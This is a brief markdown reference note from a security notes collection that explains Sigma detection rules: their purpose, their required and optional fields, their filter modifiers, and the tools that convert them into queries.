killchain-compendium/Miscellaneous/Threat Intelligence/Sigma Rules.md

Sigma Rules

An abstracted yaml configuration setup as an universal notation format which can be converted into multiple queries like Splunk, Kibana, Yara etc. ...

• SigmaHQ's repo

Specify IOC or troubleshooting issues in a data format that can be shared and versionized.
This specified configuration can be translated to multiple different tools as specific queries.

• Rule Creation Guide

Fields

A minimal configuration should contain at least the following fields

• title
• id (UUID)
• status
• description
• logsource
• detection
• condition

Additional fields may be

• falsePositives
• levels
• tags

Filters

Filter can be used to specify detection

File|endswith
CommandLine|contains
CommandLine|startswith

Transform Modifiers

A detection selection can be refined through setting a pipe | followed by the modifier contains, endswith, startswith and all.

Tools

• sigma-cli
• pySigma
• Uncoder.io
• Sigmac